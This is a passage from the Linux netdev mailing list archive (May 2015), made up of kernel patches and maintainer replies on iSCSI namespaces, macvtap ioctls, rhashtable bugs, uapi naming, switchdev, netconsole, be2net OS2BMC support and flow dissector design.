--- a/drivers/scsi/scsi_transport_iscsi.c
+++ b/drivers/scsi/scsi_transport_iscsi.c
@@ -1590,11 +1590,16 @@ static int iscsi_setup_host(struct transport_container 
*tc, struct device *dev,
 {
struct Scsi_Host *shost = dev_to_shost(dev);
struct iscsi_cls_host *ihost = shost-shost_data;
+   struct iscsi_internal *priv = to_iscsi_internal(shost-transportt);
+   struct iscsi_transport *transport = priv-iscsi_transport;
 
memset(ihost, 0, sizeof(*ihost));
atomic_set(ihost-nr_scans, 0);
mutex_init(ihost-mutex);
-   ihost-netns = init_net;
+   if (transport-get_netns)
+   ihost-netns = transport-get_netns(shost);
+   else
+   ihost-netns = init_net;
 
iscsi_bsg_host_add(shost, ihost);
/* ignore any bsg add error - we just can't do sgio */
diff --git a/include/scsi/scsi_transport_iscsi.h 
b/include/scsi/scsi_transport_iscsi.h
index 860ac0c..878bcf2 100644
--- a/include/scsi/scsi_transport_iscsi.h
+++ b/include/scsi/scsi_transport_iscsi.h
@@ -168,6 +168,7 @@ struct iscsi_transport {
int (*logout_flashnode_sid) (struct iscsi_cls_session *cls_sess);
int (*get_host_stats) (struct Scsi_Host *shost, char *buf, int len);
u8 (*check_protection)(struct iscsi_task *task, sector_t *sector);
+   struct net *(*get_netns)(struct Scsi_Host *shost);
 };
 
 /*
-- 
2.1.0

--
To unsubscribe from this list: send the line unsubscribe netdev in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html


Re: [PATCH v5] macvtap add missing ioctls

2015-05-13 Thread David Miller
From: Justin Cormack jus...@myriabit.com
Date: Wed, 13 May 2015 12:35:16 +0100

 The macvtap driver tries to emulate all the ioctls supported by a normal
 tun/tap driver, however it was missing the generic SIOCGIFHWADDR and
 SIOCSIFHWADDR ioctls to get and set the mac address that are supported
 by tun/tap. This patch adds these.
 
 Signed-off-by: Justin Cormack jus...@netbsd.org

As I stated, you cannot just send a new version of a patch I already
applied to my tree.

It is in the permanent GIT commit record, and cannot be removed.

Therefore, you must send a relative fix.
--
To unsubscribe from this list: send the line unsubscribe netdev in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html


Re: netlink rhashtable status

2015-05-13 Thread David Miller
From: Eric Dumazet eric.duma...@gmail.com
Date: Wed, 13 May 2015 09:18:04 -0700

 On Wed, 2015-05-13 at 06:04 -0700, Eric Dumazet wrote:
 On Wed, 2015-05-13 at 14:20 +0800, Herbert Xu wrote:
  On Tue, May 12, 2015 at 11:15:40PM -0700, Eric Dumazet wrote:
   
   Trick is to start about 200 threads using getaddrinfo()
  
  When it loses the kernel socket, is it permanent or intermittent?
  
  I'm trying to figure out whether it's the hashtable reader missing
  an entry that's there or whether the hashtable has been corrupted
  and an entry is gone forever.
  
  Cheers,
 
 This is permanent. We have to reboot the host.
 
 
 For 4.0.3 I replaced the two rhashtable files by current Linus version,
 and problem is gone, so the fix is not in net/netlink
 
  include/linux/rhashtable.h |   10 
  lib/rhashtable.c   |  582 ---
  2 files changed, 215 insertions(+), 377 deletions(-)
 
 I did a bisection but ended to 
 
 393619474ec0 rhashtable: Fix read-side crash during rehash
 
 And simply backporting it does not solve the problem

Backporting all of the rhashtable bits is going to be really painful
and potentially quite risky.  However, if someone is confident enough,
I'm willing to entertain this idea.

Alternatively, we could consider reverting the rhashtable conversion
of netlink in the interim.  It might be the safest solution for
-stable.

--
To unsubscribe from this list: send the line unsubscribe netdev in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html


Re: [PATCH v4] macvtap add missing ioctls - fix wrapping

2015-05-13 Thread David Miller
From: Justin Cormack jus...@myriabit.com
Date: Wed, 13 May 2015 11:06:01 +0100

 On Tue, 2015-05-12 at 23:01 -0400, David Miller wrote:
 From: Justin Cormack jus...@myriabit.com
 Date: Mon, 11 May 2015 20:00:10 +0100
 
  The macvtap driver tries to emulate all the ioctls supported by a normal
  tun/tap driver, however it was missing the generic SIOCGIFHWADDR and
  SIOCSIFHWADDR ioctls to get and set the mac address that are supported
  by tun/tap. This patch adds these.
  
  Signed-off-by: Justin Cormack jus...@netbsd.org
 
 Applied to net-next, thanks.
 
 
 The kbuild test picked up a stupid error, should I send a new patch
 version, or a patch against net-next?

Patches are never removable from my tree, so you must always send relative
fixes.
--
To unsubscribe from this list: send the line unsubscribe netdev in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html


Re: [PATCH net-next] rename RTNH_F_EXTERNAL to RTNH_F_OFFLOAD

2015-05-13 Thread David Miller
From: roopa ro...@cumulusnetworks.com
Date: Wed, 13 May 2015 06:38:02 -0700

 On 5/13/15, 1:26 AM, Daniel Borkmann wrote:
 On 05/13/2015 07:42 AM, Jiri Pirko wrote:
 Wed, May 13, 2015 at 07:27:10AM CEST, ro...@cumulusnetworks.com wrote:
 From: Roopa Prabhu ro...@cumulusnetworks.com

 RTNH_F_EXTERNAL today is printed as offload in iproute2 output.

 This patch renames the flag to be consistent with what the user sees.

 (I will post iproute2 patch if this gets accepted)

 Signed-off-by: Roopa Prabhu ro...@cumulusnetworks.com
 ---
 include/uapi/linux/rtnetlink.h |2 +-
 net/ipv4/fib_trie.c|2 +-
 net/switchdev/switchdev.c  |6 +++---
 3 files changed, 5 insertions(+), 5 deletions(-)

 diff --git a/include/uapi/linux/rtnetlink.h
 b/include/uapi/linux/rtnetlink.h
 index 974db03..17fb02f 100644
 --- a/include/uapi/linux/rtnetlink.h
 +++ b/include/uapi/linux/rtnetlink.h
 @@ -337,7 +337,7 @@ struct rtnexthop {
 #define RTNH_F_DEAD 1 /* Nexthop is dead (used by multipath) */
 #define RTNH_F_PERVASIVE2/* Do recursive gateway lookup*/
 #define RTNH_F_ONLINK4/* Gateway is forced on link*/
 -#define RTNH_F_EXTERNAL8/* Route installed externally*/
 +#define RTNH_F_OFFLOAD8/* offloaded route */

 Since this is part of uapi, I believe this is not doable :/
 i thought it was not too late :) and besides i wasn't changing the
 value and just the name.
 current iproute2 would still build for example.

If it made it into a release kernel, you cannot change it.

Period.
--
To unsubscribe from this list: send the line unsubscribe netdev in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html


Re: [PATCH net-next 0/4] switchdev: more (minor) cleanups

2015-05-13 Thread David Miller
From: sfel...@gmail.com
Date: Tue, 12 May 2015 23:03:50 -0700

 Fix some sparse warnings and include some documentation review comments that
 didn't get picked up in the switchdev Spring Cleanup series.

Series applied, thanks Scott.
--
To unsubscribe from this list: send the line unsubscribe netdev in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html


Re: [PATCH net-next] switchdev: don't use anonymous union on switchdev attr/obj structs

2015-05-13 Thread David Miller
From: sfel...@gmail.com
Date: Wed, 13 May 2015 11:16:50 -0700

 From: Scott Feldman sfel...@gmail.com
 
 Older gcc versions (e.g.  gcc version 4.4.6) don't like anonymous unions
 which was causing build issues on the newly added switchdev attr/obj
 structs.  Fix this by using named union on structs.
 
 Signed-off-by: Scott Feldman sfel...@gmail.com
 Reported-by: Or Gerlitz ogerl...@mellanox.com

Applied, thanks.
--
To unsubscribe from this list: send the line unsubscribe netdev in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html


Re: [PATCH net-next] fix missing copy_from_user in macvtap

2015-05-13 Thread David Miller
From: Justin Cormack jus...@myriabit.com
Date: Wed, 13 May 2015 19:19:02 +0100

 Fix missing copy_from_user in macvtap SIOCSIFHWADDR ioctl.
 
 Signed-off-by: Justin Cormack jus...@netbsd.org

Applied.
--
To unsubscribe from this list: send the line unsubscribe netdev in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html


Re: [PATCH 4/4] netconsole: implement extended console support

2015-05-13 Thread David Miller
From: Tejun Heo t...@kernel.org
Date: Wed, 13 May 2015 11:46:20 -0400

 Hello, David.
 
 On Tue, May 12, 2015 at 07:23:22PM -0400, David Miller wrote:
 Second question, is there an upper bound on this header size?
 Because if there is, it seems to me that there is no reason why we
 can't just avoid the fragmentation support altogether.

 The current code limits to 1000 bytes, and that limit seems arbitrary.
 Obviously this code is meant to work on interfaces with an ethernet
 MTU or larger.  So you could bump the limit enough to accomodate the
 new header size, yet still be within the real constraints.
 
 What do you think?
 
 Yeah, if we can bump the tx size enough to accomodate all messages,
 it'd be great.  It can get fairly large tho.  The absolute maximum
 right now is 8k.  While regular prink message bodies are capped
 slightly below 1k, the dictionary printed through vprintk_emit()
 doesn't have such length limit.  Another factor is that non-printables
 are escaped using \xXX and vprintk_emit() is supposed to be useable
 with transmitting binary data (like low level device error
 descriptors) although I'm not sure anybody is doing that yet.

Yeah, 8K is too much to handle, oh well.

Ok I'm fine with this series from my end, and you can merge this
wherever the extended console support bits go.

Signed-off-by: David S. Miller da...@davemloft.net

Thanks.
--
To unsubscribe from this list: send the line unsubscribe netdev in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html


[PATCH net-next 3/3] be2net: Support for OS2BMC.

2015-05-13 Thread Venkat Duvvuru
OS2BMC feature will allow the server to communicate with the on-board
BMC/idrac (Baseboard Management Controller) over the LOM via
standard Ethernet.

When OS2BMC feature is enabled, the LOM will filter traffic coming
from the host. If the destination MAC address matches the iDRAC MAC
address, it will forward the packet to the NC-SI side band interface
for iDRAC processing. Otherwise, it would send it out on the wire to
the external network. Broadcast and multicast packets are sent on the
side-band NC-SI channel and on the wire as well. Some of the packet
filters are not supported in the NIC and hence driver will identify
such packets and will hint the NIC to send those packets to the BMC.
This is done by duplicating packets on the management ring. Packets
are sent to the management ring, by setting mgmt bit in the wrb header.
The NIC will forward the packets on the management ring to the BMC
through the side-band NC-SI channel.

Please refer to this online document for more details,
http://www.dell.com/downloads/global/products/pedge/
os_to_bmc_passthrough_a_new_chapter_in_system_management.pdf

Signed-off-by: Venkat Duvvuru venkatkumar.duvv...@emulex.com
---
 drivers/net/ethernet/emulex/benet/be.h  |8 ++-
 drivers/net/ethernet/emulex/benet/be_cmds.c |   19 
 drivers/net/ethernet/emulex/benet/be_cmds.h |   17 
 drivers/net/ethernet/emulex/benet/be_main.c |  138 +++
 4 files changed, 181 insertions(+), 1 deletions(-)

diff --git a/drivers/net/ethernet/emulex/benet/be.h 
b/drivers/net/ethernet/emulex/benet/be.h
index 63922d4..8d12b41 100644
--- a/drivers/net/ethernet/emulex/benet/be.h
+++ b/drivers/net/ethernet/emulex/benet/be.h
@@ -384,6 +384,7 @@ enum vf_state {
 #define BE_FLAGS_SETUP_DONEBIT(9)
 #define BE_FLAGS_EVT_INCOMPATIBLE_SFP  BIT(10)
 #define BE_FLAGS_ERR_DETECTION_SCHEDULED   BIT(11)
+#define BE_FLAGS_OS2BMCBIT(12)
 
 #define BE_UC_PMAC_COUNT   30
 #define BE_VF_UC_PMAC_COUNT2
@@ -428,6 +429,8 @@ struct be_resources {
u32 vf_if_cap_flags;/* VF if capability flags */
 };
 
+#define be_is_os2bmc_enabled(adapter) (adapter-flags  BE_FLAGS_OS2BMC)
+
 struct rss_info {
u64 rss_flags;
u8 rsstable[RSS_INDIR_TABLE_LEN];
@@ -461,7 +464,8 @@ enum {
BE_WRB_F_LSO_BIT,   /* LSO */
BE_WRB_F_LSO6_BIT,  /* LSO6 */
BE_WRB_F_VLAN_BIT,  /* VLAN */
-   BE_WRB_F_VLAN_SKIP_HW_BIT   /* Skip VLAN tag (workaround) */
+   BE_WRB_F_VLAN_SKIP_HW_BIT,  /* Skip VLAN tag (workaround) */
+   BE_WRB_F_OS2BMC_BIT /* Send packet to the management ring */
 };
 
 /* The structure below provides a HW-agnostic abstraction of WRB params
@@ -584,6 +588,8 @@ struct be_adapter {
struct be_hwmon hwmon_info;
u8 pf_number;
struct rss_info rss_info;
+   /* Filters for packets that need to be sent to BMC */
+   u32 bmc_filt_mask;
 };
 
 #define be_physfn(adapter) (!adapter-virtfn)
diff --git a/drivers/net/ethernet/emulex/benet/be_cmds.c 
b/drivers/net/ethernet/emulex/benet/be_cmds.c
index dce8786..4115054 100644
--- a/drivers/net/ethernet/emulex/benet/be_cmds.c
+++ b/drivers/net/ethernet/emulex/benet/be_cmds.c
@@ -333,6 +333,21 @@ static void be_async_grp5_pvid_state_process(struct 
be_adapter *adapter,
}
 }
 
+#define MGMT_ENABLE_MASK   0x4
+static void be_async_grp5_fw_control_process(struct be_adapter *adapter,
+struct be_mcc_compl *compl)
+{
+   struct be_async_fw_control *evt = (struct be_async_fw_control *)compl;
+   u32 evt_dw1 = le32_to_cpu(evt-event_data_word1);
+
+   if (evt_dw1  MGMT_ENABLE_MASK) {
+   adapter-flags |= BE_FLAGS_OS2BMC;
+   adapter-bmc_filt_mask = le32_to_cpu(evt-event_data_word2);
+   } else {
+   adapter-flags = ~BE_FLAGS_OS2BMC;
+   }
+}
+
 static void be_async_grp5_evt_process(struct be_adapter *adapter,
  struct be_mcc_compl *compl)
 {
@@ -349,6 +364,10 @@ static void be_async_grp5_evt_process(struct be_adapter 
*adapter,
case ASYNC_EVENT_PVID_STATE:
be_async_grp5_pvid_state_process(adapter, compl);
break;
+   /* Async event to disable/enable os2bmc and/or mac-learning */
+   case ASYNC_EVENT_FW_CONTROL:
+   be_async_grp5_fw_control_process(adapter, compl);
+   break;
default:
break;
}
diff --git a/drivers/net/ethernet/emulex/benet/be_cmds.h 
b/drivers/net/ethernet/emulex/benet/be_cmds.h
index c713d51..2716e6f 100644
--- a/drivers/net/ethernet/emulex/benet/be_cmds.h
+++ b/drivers/net/ethernet/emulex/benet/be_cmds.h
@@ -105,6 +105,7 @@ struct be_mcc_compl {
 #define ASYNC_DEBUG_EVENT_TYPE_QNQ 1
 #define ASYNC_EVENT_CODE_SLIPORT   0x11
 #define 

Re: [PATCH v3 net-next 1/5] net: Get skb hash over flow_keys structure

2015-05-13 Thread David Miller
From: Tom Herbert t...@herbertland.com
Date: Wed, 13 May 2015 15:37:50 -0400

 On Wed, May 13, 2015 at 3:30 PM, David Miller da...@davemloft.net wrote:
 From: Tom Herbert t...@herbertland.com
 Date: Tue, 12 May 2015 08:22:58 -0700

 @@ -15,6 +15,13 @@
   * All the members, except thoff, are in network byte order.
   */
  struct flow_keys {
 + u16 thoff;
 + u16 padding1;
 +#define FLOW_KEYS_HASH_START_FIELD   n_proto
 + __be16  n_proto;
 + u8  ip_proto;
 + u8  padding;
 +

 This padding works if everyone consistently zero initializes the whole
 key structure, but for whatever reason (performance, unintentional
 oversight, etc.) not all paths do.

 So, for example, inet_set_txhash() is going to have random crap in
 keys.padding, so the hashes computed are not stable for a given flow
 key tuple.

 That's just the first code path I found with this issue, there are
 probably several others.
 
 memset zero is in the second patch for inet_set_txhash and
 ip6_set_txhash. I can respin so those are in the first patch.

Yes, for bisectability you should probably do that.
--
To unsubscribe from this list: send the line unsubscribe netdev in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html


Re: [patch net-next v3 00/15] introduce programable flow dissector and cls_flower

2015-05-13 Thread David Miller
From: Tom Herbert t...@herbertland.com
Date: Wed, 13 May 2015 15:27:59 -0400

 I'm sure there will be some performance improvements possible, and I
 hope you will look into making sure this new programmable classifier
 is as light weight as possible.
 ...

 I still have concerns about making flow_dissector more complex like
 this. This still seems like it should this programmable logic be done
 in a separate function. We call flow_dissector at least once per
 packet via skb_get_hash, it is in the critical path, and adding
 several conditionals can only slow it down and provides no new value
 to skb_get_hash. At the very least can we at least get some
 performance numbers to show impact of this?

The part of what I said to Jiri above is meant exactly to ensure that
he handles this.

If we need a specialized fast path for the skb_get_hash() code paths,
so be it.

But I'm not going to denouce his entire efforts for something that
hasn't even been shown to be an issue yet.  And if it is, I'm sure
Jiri will work to address it.
--
To unsubscribe from this list: send the line unsubscribe netdev in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html